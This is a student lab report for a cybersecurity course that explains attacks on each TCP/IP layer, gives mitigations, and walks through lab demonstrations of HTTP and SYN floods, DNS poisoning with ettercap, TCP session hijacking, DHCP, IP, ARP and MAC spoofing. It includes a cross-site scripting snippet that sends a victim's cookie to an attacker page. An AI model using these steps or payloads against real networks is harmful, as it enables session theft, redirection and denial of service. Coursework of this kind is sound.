Cybersecurity Lab Course

Attacks on each layer of TCP/IP

model
Gauri Shewale - 191071068 | Dhruvi Doshi - 191071080

Aim
To study TCP/IP Security Model, and perform attacks on each layer of TCP/IP model

Theory
TCP/IP Model
TCP/IP stands for Transmission Control Protocol/ Internet Protocol. TCP/IP Stack is specifically designed
as a model to offer highly reliable and end-to-end byte stream over an unreliable internetwork.

TCP/IP Model is used to determine how a computer should be connected to the internet as well as how
data should be transmitted between them. It helps in creation of a virtual network when multiple computer
networks are connected together. The purpose of the TCP/IP model is to allow communication over large
distances.
Application Layer

The application layer is the scope within which applications, or processes, create user data and
communicate this data to other applications on another or the same host. The applications make use of the
services provided by the underlying lower layers, especially the transport layer which provides reliable or
unreliable pipes to other processes. The communications partners are characterized by the application
architecture, such as the client–server model and peer-to-peer networking. This is the layer in which all
application protocols, such as SMTP, FTP, SSH, HTTP, operate. Processes are addressed via ports which
essentially represent services.

Transport Layer

The transport layer performs host-to-host communications on either the local network or remote networks
separated by routers.[34] It provides a channel for the communication needs of applications. UDP is the
basic transport layer protocol, providing an unreliable connectionless datagram service. The Transmission
Control Protocol provides flow-control, connection establishment, and reliable transmission of data.

Internet Layer

The internet layer exchanges datagrams across network boundaries. It provides a uniform networking
interface that hides the actual topology (layout) of the underlying network connections. It is therefore also
the layer that establishes internetworking. Indeed, it defines and establishes the Internet. This layer
defines the addressing and routing structures used for the TCP/IP protocol suite. The primary protocol in
this scope is the Internet Protocol, which defines IP addresses. Its function in routing is to transport
datagrams to the next host, functioning as an IP router, that has the connectivity to a network closer to the
final data destination.

Link Layer

The link layer defines the networking methods within the scope of the local network link on which hosts
communicate without intervening routers. This layer includes the protocols used to describe the local
network topology and the interfaces needed to affect the transmission of Internet layer datagrams to next-
neighbor hosts.

Attacks possible:

Layer Attack

Application DDoS, SQL injection, Cross Site Scripting

Transport Session hijacking, SYN flooding, SSL stripping

Internet DHCP spoofing

2
 Link ARP spoofing, MAC flooding

References:
https://www.researchgate.net/publication/322653426_A_Study_on_Different_Attacks_on_Transport_Net
work_and_Data_Link_Layer_in_TCPIP

http://seclab.cs.sunysb.edu/sekar/papers/netattacks.pdf

Experimentation
1) HTTP Flood Attack
An HTTP flood attack is a type of volumetric distributed denial-of-service (DDoS) attack
designed to overwhelm a targeted server with HTTP requests. Once the target has been saturated
with requests and is unable to respond to normal traffic, denial-of-service will occur for
additional requests from actual users.

How does a HTTP Flood Attack work?

HTTP flood attacks are a type of “ the application layer” DDos attacks , and refers to internet
protocols such as HTTP. HTTP is the basis of browser-based internet requests, and is commonly used to
load webpages or to send form contents over the Internet. Mitigating application layer attacks is
particularly complex, as the malicious traffic is difficult to distinguish from normal traffic.

3
 In order to achieve maximum efficiency, malicious actors will commonly employ or create
botnets in order to maximize the impact of their attack. By utilizing many devices infected with malware,
an attacker is able to leverage their efforts by launching a larger volume of attack traffic.

There are two varieties of HTTP flood attacks:

HTTP GET attack - In this form of attack, multiple computers or other devices are coordinated
to send multiple requests for images, files, or some other asset from a targeted server. When the target is
inundated with incoming requests and responses, denial-of-service will occur to additional requests from
legitimate traffic sources.

HTTP POST attack - Typically when a form is submitted on a website, the server must handle
the incoming request and push the data into a persistence layer, most often a database. The process of
handling the form data and running the necessary database commands is relatively intensive compared to
the amount of processing power and bandwidth required to send the POST request. This attack utilizes the
disparity in relative resource consumption, by sending many post requests directly to a targeted server
until its capacity is saturated and denial-of-service occurs.

Prevention

One method is to implement a challenge to the requesting machine in order to test whether or not
it is a bot, much like a captcha test commonly found when creating an account online. By giving a
requirement such as a JavaScript computational challenge, many attacks can be mitigated.

Other avenues for stopping HTTP floods include the use of a web application firewall (WAF), managing
an IP reputation database in order to track and selectively block malicious traffic, and on-the-fly analysis
by engineers. Having an advantage of scale with over 20 million Internet properties allows Cloudflare the
ability to analyze traffic from a variety of sources and mitigate potential attacks with quickly updated
WAF rules and other mitigation strategies to eliminate application layer DDoS traffic.

Implementation

For this attack we have used two virtual machines

1) Attacker Machine: Kali Linux

2) Victim Machine: Windows

Attacker Machine

4
Victim Machine

Before attack:

During attack

5
 2) DNS Cache Poisoning
DNS cache poisoning is the act of entering false information into a DNS cache, so that DNS
queries return an incorrect response and users are directed to the wrong websites. DNS cache poisoning is

6
also known as 'DNS spoofing.' IP addresses are the 'room numbers' of the Internet, enabling web traffic to
arrive in the right places. DNS resolver caches are the 'campus directory,' and when they store faulty
information, traffic goes to the wrong places until the cached information is corrected. (Note that this
does not actually disconnect the real websites from their real IP addresses.)

Because there is typically no way for DNS resolvers to verify the data in their caches, incorrect DNS
information remains in the cache until the time to live (TTL) expires, or until it is removed manually. A
number of vulnerabilities make DNS poisoning possible, but the chief problem is that DNS was built for a
much smaller Internet and based on a principle of trust (much like BGP). A more secure DNS protocol
called DNSSEC aims to solve some of these problems, but it has not been widely adopted yet.

How do attackers poison DNS caches?

Attackers can poison DNS caches by impersonating DNS nameservers, making a request to a DNS
resolver, and then forging the reply when the DNS resolver queries a nameserver. This is possible
because DNS servers use UDP instead of TCP, and because currently there is no verification for DNS
information.

DNS Cache Poisoning Process:

Poisoned DNS Cache:

7
Instead of using TCP, which requires both communicating parties to perform a 'handshake' to initiate
communication and verify the identity of the devices, DNS requests and responses use UDP, or the User
Datagram Protocol. With UDP, there is no guarantee that a connection is open, that the recipient is ready
to receive, or that the sender is who they say they are. UDP is vulnerable to forging for this reason – an
attacker can send a message via UDP and pretend it's a response from a legitimate server by forging the
header data.

If a DNS resolver receives a forged response, it accepts and caches the data uncritically because there is
no way to verify if the information is accurate and comes from a legitimate source. DNS was created in
the early days of the Internet, when the only parties connected to it were universities and research centers.
There was no reason to expect that anyone would try to spread fake DNS information.

Despite these major points of vulnerability in the DNS caching process, DNS poisoning attacks are not
easy. Because the DNS resolver does actually query the authoritative nameserver, attackers have only a
few milliseconds to send the fake reply before the real reply from the authoritative nameserver arrives.

Attackers also have to either know or guess a number of factors to carry out DNS spoofing attacks:

● Which DNS queries are not cached by the targeted DNS resolver, so that the resolver will query
the authoritative nameserver
● What port* the DNS resolver is using – they used to use the same port for every query, but now
they use a different, random port each time
● The request ID number

8
 ● Which authoritative nameserver the query will go to

Attackers could also gain access to the DNS resolver in some other way. If a malicious party operates,
hacks, or gains physical access to a DNS resolver, they can more easily alter cached data.

*In networking, a port is a virtual point of communication reception. Computers have multiple ports, each
with their own number, and for computers to talk to each other, certain ports have to be designated for
certain kinds of communication. For instance, HTTP communications always go to port 80, and HTTPS
always uses port 443.

Implementation:
Attacker Machine: Kali Linux
Victim Machine: Windows

So, in the attacker machine, we have created a HTML page which we will redirect to while demonstrating
cache poisoning. - index_new.html

9
We start the web server of attacker machine

We will use ettercap to perform dns cache poisoning.

Before the attack, we do some configuration changes

10
We change the ec_uid = 65534 and ec_gid = 66534 to ec_uid=0 and ec_gid = 0

We add an entry in /etc/ettercap/etter.dns

11
We start the ettercap application by typing

ettercap -G

12
In Attacker Machine (Kali) terminal

We click on the three dots icon ( Ettercap Menu) -> Hosts -> Scan Hosts

->

On clicking the Hosts list, we get a table of IPs and their MAC addresses

13
Selecting 192.168.0.104 , we click on Add to Target 1.

Now, in the Mitm menu, we click on Arp poisoning and select Optional parameter of

Sniff Remote Connections

14
After this, we click on Plugins in EttercapMenu -> Manage Plugins -> dns_spoof

15
We have successfully conducted the DNS cache poisoning attack.

16
On Victim Machine,during this attack, any Http website gets redirected to our attacker Machine’s
website.

3) SYN Flood Attack

A SYN flood (half-open attack) is a type of denial-of-service (DDoS) attack which aims to make a server
unavailable to legitimate traffic by consuming all available server resources. By repeatedly sending initial
connection request (SYN) packets, the attacker is able to overwhelm all available ports on a targeted
server machine, causing the targeted device to respond to legitimate traffic sluggishly or not at all.

How does a SYN flood attack work?

SYN flood attacks work by exploiting the handshake process of a TCP connection. Under normal
conditions, TCP connection exhibits three distinct processes in order to make a connection.

➢ First, the client sends a SYN packet to the server in order to initiate the connection.
➢ The server then responds to that initial packet with a SYN/ACK packet, in order to acknowledge
the communication.
➢ Finally, the client returns an ACK packet to acknowledge the receipt of the packet from the
server. After completing this sequence of packet sending and receiving, the TCP connection is
open and able to send and receive data.

17
To create denial-of-service, an attacker exploits the fact that after an initial SYN packet has been
received, the server will respond back with one or more SYN/ACK packets and wait for the final step in
the handshake. Here’s how it works:

1. The attacker sends a high volume of SYN packets to the targeted server, often with spoofed IP
addresses.
2. The server then responds to each one of the connection requests and leaves an open port ready to
receive the response.
3. While the server waits for the final ACK packet, which never arrives, the attacker continues to
send more SYN packets. The arrival of each new SYN packet causes the server to temporarily
maintain a new open port connection for a certain length of time, and once all the available ports
have been utilized the server is unable to function normally.

18
In networking, when a server is leaving a connection open but the machine on the other side of the
connection is not, the connection is considered half-open. In this type of DDoS attack, the targeted server
is continuously leaving open connections and waiting for each connection to timeout before the ports
become available again. The result is that this type of attack can be considered a “half-open attack”.

Prevention / Mitigation

SYN flood vulnerability has been known for a long time and a number of mitigation pathways have been
utilized. A few approaches include:

Increasing Backlog queue

Each operating system on a targeted device has a certain number of half-open connections that it will
allow. One response to high volumes of SYN packets is to increase the maximum number of possible
half-open connections the operating system will allow. In order to successfully increase the maximum
backlog, the system must reserve additional memory resources to deal with all the new requests. If the
system does not have enough memory to be able to handle the increased backlog queue size, system
performance will be negatively impacted, but that still may be better than denial-of-service.

Recycling the Oldest Half-Open TCP connection

19
Another mitigation strategy involves overwriting the oldest half-open connection once the backlog has
been filled. This strategy requires that the legitimate connections can be fully established in less time than
the backlog can be filled with malicious SYN packets. This particular defense fails when the attack
volume is increased, or if the backlog size is too small to be practical.

SYN cookies

This strategy involves the creation of a cookie by the server. In order to avoid the risk of dropping
connections when the backlog has been filled, the server responds to each connection request with a
SYN-ACK packet but then drops the SYN request from the backlog, removing the request from memory
and leaving the port open and ready to make a new connection. If the connection is a legitimate request,
and a final ACK packet is sent from the client machine back to the server, the server will then reconstruct
(with some limitations) the SYN backlog queue entry. While this mitigation effort does lose some
information about the TCP connection, it is better than allowing denial-of-service to occur to legitimate
users as a result of an attack.

Implementation
● Attacker Machine : Kali Linux
● Victim Machine : Ubuntu OS
● Machine Used to check ping results : Windows

Victim IP Address : 192.168.0.106

Pinging the target machine from the Windows machine using the ping command. We can see that the

20
response time from the target machine is very less(around 1ms).

Now we flood the victim machine by making SYN requests using the hping3 tool in Kali Linux. This will
flood the target machine by making continuous SYN requests for TCP connection

Now when we ping the target machine from the Windows machine we can see the significant delay in the
response and many requests also getting timed out.

21
System Monitor on Victim Machine :

Before Attack:

22
During attack:

4) TCP Session Hijacking

TCP session hijacking is a security attack on a user session over a protected network. The most common
method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert

23
commands into an active communication between two nodes on a network and disguise itself as one of
the authenticated users. This type of attack is possible because authentication typically is only done at the
start of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a
sniffer, can observe the communication between devices and collect the data that is transmitted.

Different ways of session hijacking

There are many ways to do Session Hijacking. Some of them are given below –

Using Packet Sniffers

24
In the above figure, it can be seen that the attacker captures the victim’s session ID to gain access to the
server by using some packet sniffers.

Cross Site Scripting(XSS Attack)

Attackers can also capture a victim's Session ID using XSS attack by using javascript. If an attacker sends
a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the
JavaScript will run and complete the instructions made by the attacker.

<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' +
escape(document.cookie);
</SCRIPT>

25
IP Spoofing

Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to the
computer with an IP address of a trusted host. In implementing this technique, an attacker has to obtain
the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP
session, so as to fool the server that it is communicating with the victim i.e. the original host.

Blind Attack

If an attacker is not able to sniff packets and guess the correct sequence number expected by the server,
brute force combinations of sequence numbers can be tried.

Prevention / Mitigation

To defend a network with session hijacking, a defender has to implement both security measures at
Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so
that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing.
This encryption can be provided by using protocols such as IPSEC, SSL, SSH etc. Internet security
protocol (IPSEC) has the ability to encrypt the packet on some shared key between the two parties
involved in communication. IPsec runs in two modes: Transport and Tunnel.

In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet
headers and data are encrypted, so it is more restrictive.

Implementation

26
We installed the telnet on the server machine and made changes in the
configuration for the host.

27
We enabled the telnet on client machine(Windows 10) by running command in in
the windows run pkgmgr /iu:"TelnetClient"

Before making the connection we started capturing packets using wireshark in the
attacker machine

28
Then we made the telnet connection between client and server by running the
command telnet <host_ip> Then entered the login id and password of the host

We can see the TCP requests between client and server

We opened the last TCP packet and noted the source port, sequence number and
ack number of the tcp request using this we made the tcp request and using scapy
we made the TCP request to retrieve the file from the server. We sent this file

29
output to port no 33267 where we printed the file contents.

5) DHCP Spoofing
What is DHCP?

DHCP (Dynamic Host Configuration Protocol) is an application layer network management protocol that
provides a quick, automatic and central system for the distribution and assignment of IP addresses and
TCP/IP configuration information for clients in a network.

DHCP can be used to assign subnet mask information, default gateway IP addresses, domain name
system (DNS) addresses, and more.

30
DHCP spoofing attack methods

By default, the DHCP protocol uses no form of authentication and is sent on broadcast, so potentially any
device on the network could receive and possibly tamper with the messages. Let’s consider what could
happen if an attacker were to combine attacks – for example, DHCP starvation and Rogue DHCP – to
launch a Man-In-The-Middle attack (MITM).

DHCP Starvation Attack

In a DHCP starvation attack, an attacker sends the DHCP server multiple DHCPREQUEST messages
with spoofed source MAC addresses within a short time span in order to deplete the server’s pool of
available IP addresses and prevent a race condition. The “starved” DHCP server will not respond to new
DHCP requests until a new address becomes available.

A DHCP starvation attack sets the stage for the attacker to pass himself off as the DHCP server and send
out spoofed messages to trick other clients on the network.

Rogue DHCP attack

Now the attacker can set up his own rogue DHCP server, listen for incoming broadcast requests, and send
out spoofed responses with malicious configurations. Usually, the attacker will aim to set himself as the

31
DNS server and default gateway for the clients.

The attacker will open port 53 on his machine for DNS activity, so that every DNS resolution request will
reach his machine, allowing him to choose when to answer with his own hostname.

Prevention: DHCP snooping

The DHCP snooping feature on Cisco and Juniper switches can be used to mitigate a DHCP server
spoofing attack. With this mechanism switch ports are configured in two different state, the trusted and
untrusted state. If a port is configured to be trusted, it can receive DHCP responses. In other way, if a port
is untrusted, it is not allowed to receive DHCP responses, and if a false attackers DHCP response attempts
to enter an untrusted port, the port will be disabled.

Implementation

Initial IP of victim machine

Starting DHCP spoofing attack on Kali Linux from ettercap.

Note the IP pool & DHCP Server IP

32
Dropping current IP address on client

33
Checking current DHCP service provider.

Verifying it with IP of Kali

DHCP discover request. Note that assigned IP is in the range of our IP pool.

34
DHCP message exchanges

35
 6) IP Spoofing
P spoofing is the creation of Internet Protocol (IP) packets which have a modified source address in order
to either hide the identity of the sender, to impersonate another computer system, or both. It is a technique
often used by bad actors to invoke DDoS attacks against a target device or the surrounding infrastructure.

Prevention : packet filtering

While IP spoofing can’t be prevented, measures can be taken to stop spoofed packets from infiltrating a
network. A very common defense against spoofing is ingress filtering, outlined in BCP38 (a Best
Common Practice document). Ingress filtering is a form of packet filtering usually implemented on a
network edge device which examines incoming IP packets and looks at their source headers. If the source
headers on those packets don’t match their origin or they otherwise look fishy, the packets are rejected.
Some networks will also implement egress filtering, which looks at IP packets exiting the network,
ensuring that those packets have legitimate source headers to prevent someone within the network from
launching an outbound malicious attack using IP spoofing.

Implementation

Using nmap to perform spoofing

Wireshark to capture packets using spoofed address

36
 7) ARP Poisoning
Address Resolution Protocol (ARP) is a protocol that enables network communications to reach a specific
device on the network. ARP translates Internet Protocol (IP) addresses to a Media Access Control (MAC)
address, and vice versa. Most commonly, devices use ARP to contact the router or gateway that enables
them to connect to the Internet.

Hosts maintain an ARP cache, a mapping table between IP addresses and MAC addresses, and use it to
connect to destinations on the network. If the host doesn’t know the MAC address for a certain IP
address, it sends out an ARP request packet, asking other machines on the network for the matching MAC
address.

The ARP protocol was not designed for security, so it does not verify that a response to an ARP request
really comes from an authorized party. It also lets hosts accept ARP responses even if they never sent out
a request. This is a weak point in the ARP protocol, which opens the door to ARP spoofing attacks.

ARP only works with 32-bit IP addresses in the older IPv4 standard. The newer IPv6 protocol uses a
different protocol, Neighbor Discovery Protocol (NDP), which is secure and uses cryptographic keys to
verify host identities. However, since most of the Internet still uses the older IPv4 protocol, ARP remains
in wide use.

37
ARP Spoofing Prevention

Here are a few best practices that can help you prevent ARP Spoofing on your network:

Use a Virtual Private Network (VPN)—a VPN allows devices to connect to the Internet through an
encrypted tunnel. This makes all communication encrypted, and worthless for an ARP spoofing attacker.

Use static ARP—the ARP protocol lets you define a static ARP entry for an IP address, and prevent
devices from listening on ARP responses for that address. For example, if a workstation always connects
to the same router, you can define a static ARP entry for that router, preventing an attack.

Use packet filtering—packet filtering solutions can identify poisoned ARP packets by seeing that they
contain conflicting source information, and stop them before they reach devices on your network.

Run a spoofing attack—check if your existing defenses are working by mounting a spoofing attack, in
coordination with IT and security teams. If the attack succeeds, identify weak points in your defensive
measures and remediate them.

Implementation

38
39
40
41
 8) MAC Spoofing
MAC address spoofing is very simple as it means a method for changing or masking the factory-assigned
MAC address of a network interface on a device.

Theoretically, every network device in the world is identified by a MAC address. But not every user
wants this transparency on the internet. One reason to mask your MAC address is for the protection of
privacy – for example, in public WLAN networks. This legitimate use of MAC spoofing is in opposition
to the illegal activities, where users change MAC addresses to circumvent access restrictions and security
measures or imitate the identity of another network device.

Legitimate reasons

1. Anomization
2. Identity theft
3. License terms

42
The most common reason to change or spoof MAC addresses is to maintain privacy. When you connect
to a public network, the MAC address gets exposed to that network. Spoofing or changing your MAC
address keeps your ID unexposed and thus maintaining the privacy of the user. Spoofing or changing
MAC addresses maintains our privacy. It is recommended to use a spoofed MAC address when
connecting to a public network or a VPN.

Prevention

Spoofing a MAC address doesn’t go around the network and hence a network manager will still be able to
scrutinize the traffic from the spoofed MAC address. An address that has been spoofed will end up
showing traffic from two different sources concurrently. Another method would be a company device
ostensibly connected to the network from another physical location on the network. It is also imperative
to harden the system, access points, or individual machines to prevent MAC spoofing attacks.

One can also firewall or can run a service built especially for MAC SPOOFING, for raising protection
against MAC spoofing. There are many MAC spoofing tools that would facilitate the detection of MAC
spoofing examples such as Reverse ARP, traffic analyzers, and bandwidth monitors.

Implementation

43
44
45
Implementation (Method 2) : CLI

46
Conclusion
Thus, in this experiment, we learned about various cyber attacks on different layers of TCP/IP model and
successfully demonstrated HTTP Flood Attack, DNS Cache Poisoning, SYN Flood Attack, TCP Session
Hijacking, DHCP Spoofing, IP Spoofing, ARP Poisoning and MAC Spoofing.

Resources
1. https://pentera.io/blog/dhcp-spoofing-101/
2. https://howdoesinternetwork.com/2012/prevent-dhcp-server-spoofing
3. https://www.cloudflare.com/en-gb/learning/ddos/glossary/ip-spoofing/
4. https://www.imperva.com/learn/application-security/arp-spoofing/
5. https://www.ionos.com/digitalguide/server/know-how/what-is-mac-spoofing/
6. https://www.linuxfordevices.com/tutorials/ubuntu/spoof-mac-address :star
7. https://security.stackexchange.com/questions/225985/is-there-any-point-of-arp-spoofing-on-a-
wifi-network
8. https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/ :star
9. https://medium.com/@ayushir/dhcp-snooping-attack-ca728e4dd84
10. https://www.geeksforgeeks.org/virtual-private-network-vpn-setup-in-kali-linux/
11. https://www.interviewbit.com/blog/nmap-commands/
12.

47
48